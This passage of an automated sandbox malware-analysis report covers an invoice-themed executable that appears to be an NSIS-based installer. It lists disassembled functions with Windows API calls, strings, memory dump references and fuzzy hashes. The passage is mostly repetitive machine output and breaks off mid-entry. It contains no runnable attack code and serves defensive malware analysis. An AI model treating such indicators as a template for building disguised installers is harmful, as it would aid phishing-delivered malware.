                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                • String ID: F$Tolkningen Setup
                                • API String ID: 941294808-2961945220
                                • Opcode ID: d731168a47aac58058028b36b6280044d0ca24b31d8de32a1a16c1507812eb21
                                • Instruction ID: d36771556e1314171d00f7341d5a6d6cd4ef22ea24e197e6f7dda2bcd3f0aae3
                                • Opcode Fuzzy Hash: d731168a47aac58058028b36b6280044d0ca24b31d8de32a1a16c1507812eb21
                                • Instruction Fuzzy Hash: 3041AD720083509FC7159F65CE4896BBBE9FF88715F150A2EF9D1A22A0CA34C904CFA6
                                Function 004062E1 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 124memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,?,00406239,?,?), ref: 0040631C
                                • GetShortPathNameW.KERNEL32(00000000,00426E48,00000400), ref: 00406325
                                • GetShortPathNameW.KERNEL32(?,00426648,00000400), ref: 00406342
                                • wsprintfA.USER32 ref: 00406360
                                • GetFileSize.KERNEL32(00000000,00000000,00426648,C0000000,00000004,00426648,?), ref: 00406398
                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063A8
                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063D8
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00426248,00000000,-0000000A,00408984,00000000,[Rename],00000000,00000000,00000000), ref: 004063F8
                                • GlobalFree.KERNEL32(00000000), ref: 0040640A
                                • CloseHandle.KERNEL32(00000000), ref: 00406411
                                  • Part of subcall function 004068F6: GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,80000000,00000003,?,?,?,?,?), ref: 004068FA
                                  • Part of subcall function 004068F6: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040691A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                • String ID: %ls=%ls$HfB$HnB$[Rename]
                                • API String ID: 2900126502-165592708
                                • Opcode ID: e7f092b44845e5a987dde1640a7a18ced5189e995c1b7a4531422e6471ba5a07
                                • Instruction ID: 28d4088f706ad7906ef0a9a5075647bec21de1d5f4d95c1c1de34b852c29caff
                                • Opcode Fuzzy Hash: e7f092b44845e5a987dde1640a7a18ced5189e995c1b7a4531422e6471ba5a07
                                • Instruction Fuzzy Hash: 9431E5B12002217BD6206B359D49F7B3A5CDF81748F56443EF942BA2C2DA7DD8624A7C
                                Function 00402BA3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102memoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402C09
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402C33
                                • GlobalFree.KERNEL32(?), ref: 00402C7E
                                • GlobalFree.KERNEL32(00000000), ref: 00402C94
                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,40000000,00000002,00000000,00000000), ref: 00402CB1
                                • DeleteFileW.KERNEL32(00000000,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402CC4
                                Strings
                                • C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll, xrefs: 00402CD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                • String ID: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll
                                • API String ID: 2667972263-2928134256
                                • Opcode ID: 6ffc5b8a9f87e2e5b40759ba5e904c63f1369c7a02dc5e0df68b7fff71cda799
                                • Instruction ID: 686b8f33fe839f6b04a80afc83e47d853b1ea01e990ec980acb486ddfed3f61f
                                • Opcode Fuzzy Hash: 6ffc5b8a9f87e2e5b40759ba5e904c63f1369c7a02dc5e0df68b7fff71cda799
                                • Instruction Fuzzy Hash: 1E310871408351ABD310AF658E49E1FBBE8AF89754F114A3EF590772D2C77888018B9A
                                Function 00406D18 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83COMMON
                                Download Yara Rule
                                APIs
                                • CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406D8D
                                • CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                • CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DA1
                                • CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DB9
                                Strings
                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D1F
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406D18, 00406D1A
                                • *?|<>/":, xrefs: 00406D7C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Char$Next$Prev
                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                • API String ID: 589700163-879122614
                                • Opcode ID: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                • Instruction ID: 6d5cd2c23b7c5e8a6660ed42317bbe46aa043e331069955b4164b8205da208bc
                                • Opcode Fuzzy Hash: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                • Instruction Fuzzy Hash: 9E11D261B0063556DA3067298C4097B72E8DFA97A1756443BFDC6E72C0FB7C8CA193AC
                                Function 00405736 Relevance: 12.1, APIs: 8, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                • String ID:
                                • API String ID: 2320649405-0
                                • Opcode ID: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                • Instruction ID: fd6d678b7fcced70b4665a1fbec2e56912b3eb02c270adc19d2dd25120f6a122
                                • Opcode Fuzzy Hash: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                • Instruction Fuzzy Hash: 4B21F675500B04DFDB749F28DA4895B77B4EF05710B108A3EE896B26A1DB38E814CF24
                                Function 004056B5 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004056CE
                                • GetMessagePos.USER32 ref: 004056D6
                                • ScreenToClient.USER32(?,?), ref: 004056F0
                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00405704
                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0040572C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Message$Send$ClientScreen
                                • String ID: f
                                • API String ID: 41195575-1993550816
                                • Opcode ID: c033d2a482c0bbee4868c7629423a8e69750951f4e6b473a84ec653bd2017e87
                                • Instruction ID: 0216f53b5c1e39ec49102949a755e2bc9d8ef7e3372eb4174345f74bd41e4177
                                • Opcode Fuzzy Hash: c033d2a482c0bbee4868c7629423a8e69750951f4e6b473a84ec653bd2017e87
                                • Instruction Fuzzy Hash: C3014C7194020DBBEB01AF94CD45BEEBBB9EF44710F10412AFA50BA1E0C7B49A41DF54
                                Function 0040362A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38timeCOMMON
                                Download Yara Rule
                                APIs
                                • SetTimer.USER32(?,?,000000FA,00000000), ref: 00403648
                                • MulDiv.KERNEL32(000825C8,00000064,000825C8), ref: 00403670
                                • wsprintfW.USER32 ref: 00403680
                                • SetWindowTextW.USER32(?,?), ref: 00403690
                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004036A2
                                Strings
                                • verifying installer: %d%%, xrefs: 0040367A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Text$ItemTimerWindowwsprintf
                                • String ID: verifying installer: %d%%
                                • API String ID: 1451636040-82062127
                                • Opcode ID: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                • Instruction ID: 23416ea20b8bc991085432565deaec88b6a19029d37e317e26b4fa0cf66bde53
                                • Opcode Fuzzy Hash: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                • Instruction Fuzzy Hash: F7016D71540208FBEF24AFA0DE86FAA3B69AB04305F00853EF646B51E0DBB99554CF5D
                                Function 6FA42209 Relevance: 9.1, APIs: 6, Instructions: 101COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 6FA412F8: GlobalAlloc.KERNEL32(00000040,?,6FA411C4,-000000A0), ref: 6FA41302
                                • GlobalFree.KERNEL32(00000000), ref: 6FA422F1
                                • GlobalFree.KERNEL32(00000000), ref: 6FA42326
                                Memory Dump Source
                                • Source File: 00000000.00000002.2366121843.000000006FA41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FA40000, based on PE: true
                                • Associated: 00000000.00000002.2365714477.000000006FA40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000000.00000002.2366165712.000000006FA44000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000000.00000002.2366228696.000000006FA46000.00000002.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6fa40000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Global$Free$Alloc
                                • String ID:
                                • API String ID: 1780285237-0
                                • Opcode ID: 042152509be6553df307170aa8bcb2bb005df4fc8a4d590ff463ef1f24169b78
                                • Instruction ID: 904957e8cee6d7b60aabe71f2a7466ab7f2c5d326efaaae00d35bdebd6d9335b
                                • Opcode Fuzzy Hash: 042152509be6553df307170aa8bcb2bb005df4fc8a4d590ff463ef1f24169b78
                                • Instruction Fuzzy Hash: 9331D231204701DFDB259F68C944E6AB7F9FF87325B104669F801C6190D73EA4EADB61
                                Function 6FA410C7 Relevance: 8.9, APIs: 7, Instructions: 162memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6FA4116B
                                • GlobalFree.KERNEL32(00000000), ref: 6FA411AE
                                • GlobalFree.KERNEL32(00000000), ref: 6FA411CD
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6FA411E6
                                • GlobalFree.KERNEL32 ref: 6FA4125C
                                • GlobalFree.KERNEL32(?), ref: 6FA412A7
                                • GlobalFree.KERNEL32(00000000), ref: 6FA412BF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2366121843.000000006FA41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FA40000, based on PE: true
                                • Associated: 00000000.00000002.2365714477.000000006FA40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000000.00000002.2366165712.000000006FA44000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000000.00000002.2366228696.000000006FA46000.00000002.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6fa40000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Global$Free$Alloc
                                • String ID:
                                • API String ID: 1780285237-0
                                • Opcode ID: 5ec14042f296f739eab5e1175b1cdfd7771b04822892b8549811176e3bfb8ce2
                                • Instruction ID: 3b8f5ba8468a85a60c13db8f7d432964c91567952e9012b44634150381ecbd01
                                • Opcode Fuzzy Hash: 5ec14042f296f739eab5e1175b1cdfd7771b04822892b8549811176e3bfb8ce2
                                • Instruction Fuzzy Hash: 5351E2756007019FCB11DF6CC940A7A77E8FF8A314B00852AF854D7250E73AE9A5CB91
                                Function 6FA42049 Relevance: 7.6, APIs: 5, Instructions: 129memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GlobalFree.KERNEL32(00000000), ref: 6FA421BF
                                  • Part of subcall function 6FA412E1: lstrcpynW.KERNEL32(00000000,?,6FA4156A,?,6FA411C4,-000000A0), ref: 6FA412F1
                                • GlobalAlloc.KERNEL32(00000040), ref: 6FA4212C
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FA4214C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2366121843.000000006FA41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FA40000, based on PE: true
                                • Associated: 00000000.00000002.2365714477.000000006FA40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000000.00000002.2366165712.000000006FA44000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000000.00000002.2366228696.000000006FA46000.00000002.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6fa40000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                • String ID:
                                • API String ID: 4216380887-0
                                • Opcode ID: e00d17dfd1c03b88501421e17fd3b551b0508b775475356f2047a13fe100ed6f
                                • Instruction ID: b7d8c3dde70eee28fc3eeadca054a5662fc0545302e83f326e87aa0e6403b6b3
                                • Opcode Fuzzy Hash: e00d17dfd1c03b88501421e17fd3b551b0508b775475356f2047a13fe100ed6f
                                • Instruction Fuzzy Hash: 38414571405704EFC7019F28C984AEA7BF8FF86354B44423EED0CDA185DB7969E0CAA0
                                Function 00401EEA Relevance: 7.6, APIs: 5, Instructions: 74windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,?), ref: 00401F03
                                • GetClientRect.USER32(00000000,?), ref: 00401F4D
                                • LoadImageW.USER32(00000000,?,00000100,?,?,00000100), ref: 00401F82
                                • SendMessageW.USER32(00000000,00000172,00000100,00000000), ref: 00401F92
                                • DeleteObject.GDI32(00000000), ref: 00401FA1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                • String ID:
                                • API String ID: 1849352358-0
                                • Opcode ID: 7f9423f384d93fc0e3e6fbc7cac958838f77b0a9d1a07732a5146b80b1a3c62d
                                • Instruction ID: a1357e6e01c620789306e575287b66343fc6a42a857d7aaea03cc6a10a526d0d
                                • Opcode Fuzzy Hash: 7f9423f384d93fc0e3e6fbc7cac958838f77b0a9d1a07732a5146b80b1a3c62d
                                • Instruction Fuzzy Hash: 1C21B6726093029FD340DF64DE84A6BB7E8EB88304F04093EF985E62A1D778D840DB59
                                Function 00401FB8 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32 ref: 00401FB9
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401FD0
                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401FD8
                                • ReleaseDC.USER32(?,00000000), ref: 00401FEB
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00010432,?,?,?,00000000,?,?), ref: 0040604B
                                • CreateFontIndirectW.GDI32(0040C8C8), ref: 00402037
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcat
                                • String ID:
                                • API String ID: 4253744674-0
                                • Opcode ID: 9f2a315a86747fca2e42ee02dfd95963893f875b0ab85644b2b496c98eb1a616
                                • Instruction ID: a293f1e503c12f3834b95d63be9809c732b55947eac1385e5f26d009a2b4f9be
                                • Opcode Fuzzy Hash: 9f2a315a86747fca2e42ee02dfd95963893f875b0ab85644b2b496c98eb1a616
                                • Instruction Fuzzy Hash: 5401D473144780EFD300BBB49E8AA563BE8EB55706F10893EF685B71E1C9784109CB2D
                                Function 6FA41F7B Relevance: 7.5, APIs: 5, Instructions: 38memorylibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,6FA42B4C,00000000,00000808), ref: 6FA41F8C
                                • GlobalAlloc.KERNEL32(00000040,00000000), ref: 6FA41F97
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FA41FAB
                                • GetProcAddress.KERNEL32(?,00000000), ref: 6FA41FB6
                                • GlobalFree.KERNEL32(00000000), ref: 6FA41FBF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2366121843.000000006FA41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FA40000, based on PE: true
                                • Associated: 00000000.00000002.2365714477.000000006FA40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000000.00000002.2366165712.000000006FA44000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000000.00000002.2366228696.000000006FA46000.00000002.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6fa40000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                • String ID:
                                • API String ID: 1148316912-0
                                • Opcode ID: 08e03463725da0ff3356c75dcc47c74515db929b364e39f49b974b501609e6cc
                                • Instruction ID: a61b3b85c50294b7b5fd77c4aaf8c370df7bd322724a30439502dc694a2d3252
